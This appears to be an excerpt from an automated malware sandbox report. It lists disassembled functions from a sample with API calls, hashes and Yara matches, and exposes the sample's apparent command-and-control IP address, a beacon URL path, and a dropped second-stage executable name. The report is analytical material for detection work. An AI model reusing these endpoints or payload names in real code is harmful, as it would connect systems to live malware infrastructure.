                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                  • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004034E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE374A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 5d6f884e2a631f0378571fbcfb45b7c6e67310de4c9c38802ab535244214e57a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED11E172A00115BBDB059F88CC44BEEB7B9FF49610F10492AF804E7240D374BA10DBA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: T*@
                                                                                                                                                                                                                                  • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                  • Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                    • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                  • String ID: u@@
                                                                                                                                                                                                                                  • API String ID: 206117190-736001340
                                                                                                                                                                                                                                  • Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042631A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05D06581 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,05D05DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05D0658B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: c1d77b6f8993cd132e41a49579af4bdbfb7721c3a288bd8c724747b730525d1b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE086122048511A5F29492A7819ABBDF57EFC751034892ABE88657689CD515C0BD270
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A7FD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%